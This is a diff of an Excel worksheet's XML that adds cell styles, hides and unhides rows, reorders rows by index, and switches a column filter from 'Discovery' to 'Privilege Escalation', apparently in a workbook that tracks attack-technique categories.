@@ -1370,6 +1370,10 @@
     </xf>
     <xf numFmtId="0" fontId="1" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
     <xf numFmtId="0" fontId="0" fillId="3" borderId="0" xfId="0" applyFill="1"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left" wrapText="1"/>
+    </xf>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
@@ -2431,7 +2435,7 @@
   <dimension ref="A1:U103"/>
   <sheetViews>
     <sheetView tabSelected="1" zoomScale="80" zoomScaleNormal="80" workbookViewId="0">
-      <selection activeCell="E107" sqref="E107"/>
+      <selection activeCell="D99" sqref="D99"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -2582,7 +2586,7 @@
         <v>40</v>
       </c>
     </row>
-    <row r="7" spans="1:21" x14ac:dyDescent="0.25">
+    <row r="7" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A7">
         <v>6</v>
       </c>
@@ -2895,7 +2899,7 @@
         <v>5</v>
       </c>
     </row>
-    <row r="21" spans="1:21" x14ac:dyDescent="0.25">
+    <row r="21" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A21">
         <v>20</v>
       </c>
@@ -2905,11 +2909,14 @@
       <c r="C21" s="1" t="s">
         <v>220</v>
       </c>
+      <c r="D21" s="6" t="s">
+        <v>57</v>
+      </c>
       <c r="E21" t="s">
         <v>223</v>
       </c>
     </row>
-    <row r="22" spans="1:21" x14ac:dyDescent="0.25">
+    <row r="22" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A22">
         <v>21</v>
       </c>
@@ -2945,73 +2952,61 @@
     </row>
     <row r="24" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A24">
-        <v>23</v>
+        <v>30</v>
       </c>
       <c r="B24" t="s">
-        <v>62</v>
+        <v>66</v>
       </c>
       <c r="C24" s="1" t="s">
-        <v>191</v>
-      </c>
-      <c r="D24" s="6" t="s">
-        <v>58</v>
+        <v>185</v>
       </c>
       <c r="E24" t="s">
-        <v>143</v>
+        <v>134</v>
       </c>
     </row>
     <row r="25" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A25">
-        <v>24</v>
+        <v>32</v>
       </c>
       <c r="B25" t="s">
-        <v>75</v>
+        <v>66</v>
       </c>
       <c r="C25" s="1" t="s">
-        <v>258</v>
+        <v>184</v>
       </c>
       <c r="D25" s="6" t="s">
-        <v>57</v>
+        <v>58</v>
       </c>
       <c r="E25" t="s">
-        <v>257</v>
-      </c>
-      <c r="F25" t="s">
-        <v>266</v>
+        <v>132</v>
       </c>
     </row>
     <row r="26" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A26">
-        <v>25</v>
+        <v>64</v>
       </c>
       <c r="B26" t="s">
-        <v>75</v>
+        <v>66</v>
       </c>
       <c r="C26" s="1" t="s">
-        <v>190</v>
-      </c>
-      <c r="D26" s="6" t="s">
-        <v>58</v>
+        <v>147</v>
       </c>
       <c r="E26" t="s">
-        <v>79</v>
+        <v>264</v>
       </c>
     </row>
     <row r="27" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A27">
-        <v>26</v>
+        <v>65</v>
       </c>
       <c r="B27" t="s">
-        <v>75</v>
-      </c>
-      <c r="C27" s="1" t="s">
-        <v>189</v>
-      </c>
-      <c r="D27" s="6" t="s">
-        <v>139</v>
+        <v>66</v>
+      </c>
+      <c r="C27" s="9" t="s">
+        <v>148</v>
       </c>
       <c r="E27" t="s">
-        <v>7</v>
+        <v>263</v>
       </c>
     </row>
     <row r="28" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
@@ -3044,30 +3039,30 @@
     </row>
     <row r="30" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A30">
-        <v>29</v>
+        <v>95</v>
       </c>
       <c r="B30" t="s">
-        <v>75</v>
+        <v>66</v>
       </c>
       <c r="C30" s="1" t="s">
-        <v>186</v>
+        <v>231</v>
       </c>
       <c r="E30" t="s">
-        <v>23</v>
+        <v>230</v>
       </c>
     </row>
     <row r="31" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A31">
-        <v>30</v>
+        <v>97</v>
       </c>
       <c r="B31" t="s">
         <v>66</v>
       </c>
       <c r="C31" s="1" t="s">
-        <v>185</v>
+        <v>235</v>
       </c>
       <c r="E31" t="s">
-        <v>134</v>
+        <v>232</v>
       </c>
     </row>
     <row r="32" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
@@ -3089,16 +3084,19 @@
     </row>
     <row r="33" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A33">
-        <v>32</v>
+        <v>23</v>
       </c>
       <c r="B33" t="s">
-        <v>66</v>
+        <v>62</v>
       </c>
       <c r="C33" s="1" t="s">
-        <v>184</v>
+        <v>191</v>
+      </c>
+      <c r="D33" s="6" t="s">
+        <v>58</v>
       </c>
       <c r="E33" t="s">
-        <v>132</v>
+        <v>143</v>
       </c>
     </row>
     <row r="34" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -3180,7 +3178,7 @@
         <v>25</v>
       </c>
     </row>
-    <row r="39" spans="1:5" x14ac:dyDescent="0.25">
+    <row r="39" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A39">
         <v>38</v>
       </c>
@@ -3191,13 +3189,13 @@
         <v>218</v>
       </c>
       <c r="D39" s="6" t="s">
-        <v>57</v>
+        <v>58</v>
       </c>
       <c r="E39" t="s">
         <v>249</v>
       </c>
     </row>
-    <row r="40" spans="1:5" x14ac:dyDescent="0.25">
+    <row r="40" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A40">
         <v>39</v>
       </c>
@@ -3501,9 +3499,6 @@
       <c r="C58" s="1" t="s">
         <v>161</v>
       </c>
-      <c r="D58" s="6" t="s">
-        <v>56</v>
-      </c>
       <c r="E58" t="s">
         <v>31</v>
       </c>
@@ -3604,35 +3599,41 @@
         <v>59</v>
       </c>
     </row>
-    <row r="65" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+    <row r="65" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
       <c r="A65">
-        <v>64</v>
+        <v>67</v>
       </c>
       <c r="B65" t="s">
-        <v>66</v>
+        <v>62</v>
       </c>
       <c r="C65" s="1" t="s">
-        <v>147</v>
+        <v>149</v>
       </c>
       <c r="E65" t="s">
-        <v>264</v>
-      </c>
-    </row>
-    <row r="66" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>217</v>
+      </c>
+    </row>
+    <row r="66" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A66">
-        <v>65</v>
+        <v>24</v>
       </c>
       <c r="B66" t="s">
-        <v>66</v>
-      </c>
-      <c r="C66" t="s">
-        <v>148</v>
+        <v>75</v>
+      </c>
+      <c r="C66" s="10" t="s">
+        <v>258</v>
+      </c>
+      <c r="D66" s="6" t="s">
+        <v>58</v>
       </c>
       <c r="E66" t="s">
-        <v>263</v>
-      </c>
-    </row>
-    <row r="67" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>257</v>
+      </c>
+      <c r="F66" t="s">
+        <v>268</v>
+      </c>
+    </row>
+    <row r="67" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
       <c r="A67">
         <v>66</v>
       </c>
@@ -3646,35 +3647,38 @@
         <v>138</v>
       </c>
     </row>
-    <row r="68" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+    <row r="68" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A68">
-        <v>67</v>
+        <v>25</v>
       </c>
       <c r="B68" t="s">
-        <v>62</v>
+        <v>75</v>
       </c>
       <c r="C68" s="1" t="s">
-        <v>149</v>
+        <v>190</v>
       </c>
       <c r="E68" t="s">
-        <v>217</v>
-      </c>
-    </row>
-    <row r="69" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>79</v>
+      </c>
+    </row>
+    <row r="69" spans="1:6" x14ac:dyDescent="0.25">
       <c r="A69">
-        <v>68</v>
+        <v>26</v>
       </c>
       <c r="B69" t="s">
         <v>75</v>
       </c>
       <c r="C69" s="1" t="s">
-        <v>150</v>
+        <v>189</v>
+      </c>
+      <c r="D69" s="6" t="s">
+        <v>139</v>
       </c>
       <c r="E69" t="s">
-        <v>80</v>
-      </c>
-    </row>
-    <row r="70" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>7</v>
+      </c>
+    </row>
+    <row r="70" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
       <c r="A70" s="8">
         <v>69</v>
       </c>
@@ -3691,7 +3695,7 @@
         <v>83</v>
       </c>
     </row>
-    <row r="71" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+    <row r="71" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
       <c r="A71">
         <v>70</v>
       </c>
@@ -3708,7 +3712,7 @@
         <v>246</v>
       </c>
     </row>
-    <row r="72" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+    <row r="72" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
       <c r="A72">
         <v>71</v>
       </c>
@@ -3722,7 +3726,7 @@
         <v>253</v>
       </c>
     </row>
-    <row r="73" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+    <row r="73" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
       <c r="A73">
         <v>72</v>
       </c>
@@ -3736,7 +3740,7 @@
         <v>85</v>
       </c>
     </row>
-    <row r="74" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+    <row r="74" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
       <c r="A74">
         <v>73</v>
       </c>
@@ -3750,7 +3754,7 @@
         <v>89</v>
       </c>
     </row>
-    <row r="75" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+    <row r="75" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
       <c r="A75">
         <v>74</v>
       </c>
@@ -3767,7 +3771,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="76" spans="1:5" x14ac:dyDescent="0.25">
+    <row r="76" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
       <c r="A76">
         <v>75</v>
       </c>
@@ -3775,13 +3779,13 @@
         <v>65</v>
       </c>
       <c r="C76" s="1" t="s">
+        <v>266</v>
+      </c>
+      <c r="E76" t="s">
         <v>267</v>
       </c>
-      <c r="E76" t="s">
-        <v>268</v>
-      </c>
-    </row>
-    <row r="77" spans="1:5" x14ac:dyDescent="0.25">
+    </row>
+    <row r="77" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
       <c r="A77">
         <v>76</v>
       </c>
@@ -3798,7 +3802,7 @@
         <v>243</v>
       </c>
     </row>
-    <row r="78" spans="1:5" x14ac:dyDescent="0.25">
+    <row r="78" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
       <c r="A78">
         <v>77</v>
       </c>
@@ -3815,7 +3819,7 @@
         <v>98</v>
       </c>
     </row>
-    <row r="79" spans="1:5" x14ac:dyDescent="0.25">
+    <row r="79" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
       <c r="A79">
         <v>78</v>
       </c>
@@ -3832,7 +3836,7 @@
         <v>94</v>
       </c>
     </row>
-    <row r="80" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+    <row r="80" spans="1:6" hidden="1" x14ac:dyDescent="0.25">
       <c r="A80">
         <v>79</v>
       </c>
@@ -3860,7 +3864,7 @@
         <v>237</v>
       </c>
     </row>
-    <row r="82" spans="1:5" x14ac:dyDescent="0.25">
+    <row r="82" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A82">
         <v>81</v>
       </c>
@@ -3877,7 +3881,7 @@
         <v>245</v>
       </c>
     </row>
-    <row r="83" spans="1:5" x14ac:dyDescent="0.25">
+    <row r="83" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A83">
         <v>82</v>
       </c>
@@ -3905,7 +3909,7 @@
         <v>129</v>
       </c>
     </row>
-    <row r="85" spans="1:5" x14ac:dyDescent="0.25">
+    <row r="85" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A85">
         <v>84</v>
       </c>
@@ -3919,7 +3923,7 @@
         <v>221</v>
       </c>
     </row>
-    <row r="86" spans="1:5" x14ac:dyDescent="0.25">
+    <row r="86" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A86">
         <v>85</v>
       </c>
@@ -4062,18 +4066,18 @@
         <v>227</v>
       </c>
     </row>
-    <row r="96" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+    <row r="96" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A96">
-        <v>95</v>
+        <v>29</v>
       </c>
       <c r="B96" t="s">
-        <v>66</v>
+        <v>75</v>
       </c>
       <c r="C96" s="1" t="s">
-        <v>231</v>
+        <v>186</v>
       </c>
       <c r="E96" t="s">
-        <v>230</v>
+        <v>23</v>
       </c>
     </row>
     <row r="97" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
@@ -4090,21 +4094,21 @@
         <v>234</v>
       </c>
     </row>
-    <row r="98" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+    <row r="98" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A98">
-        <v>97</v>
+        <v>68</v>
       </c>
       <c r="B98" t="s">
-        <v>66</v>
+        <v>75</v>
       </c>
       <c r="C98" s="1" t="s">
-        <v>235</v>
+        <v>150</v>
       </c>
       <c r="E98" t="s">
-        <v>232</v>
-      </c>
-    </row>
-    <row r="99" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+        <v>80</v>
+      </c>
+    </row>
+    <row r="99" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A99">
         <v>98</v>
       </c>
@@ -4135,7 +4139,7 @@
         <v>239</v>
       </c>
     </row>
-    <row r="101" spans="1:5" x14ac:dyDescent="0.25">
+    <row r="101" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A101">
         <v>100</v>
       </c>
@@ -4152,7 +4156,7 @@
         <v>248</v>
       </c>
     </row>
-    <row r="102" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+    <row r="102" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A102">
         <v>101</v>
       </c>
@@ -4161,6 +4165,9 @@
       </c>
       <c r="C102" s="1" t="s">
         <v>260</v>
+      </c>
+      <c r="D102" s="6" t="s">
+        <v>56</v>
       </c>
       <c r="E102" t="s">
         <v>259</v>
@@ -4184,11 +4191,11 @@
   <autoFilter ref="A1:E103" xr:uid="{873B811C-17E0-44D6-BE49-771EF1C74A88}">
     <filterColumn colId="1">
       <filters>
-        <filter val="Discovery"/>
+        <filter val="Privilege Escalation"/>
       </filters>
     </filterColumn>
-    <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:E79">
-      <sortCondition ref="A1"/>
+    <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A24:E102">
+      <sortCondition ref="B1:B103"/>
     </sortState>
   </autoFilter>
   <conditionalFormatting sqref="D2:D305">
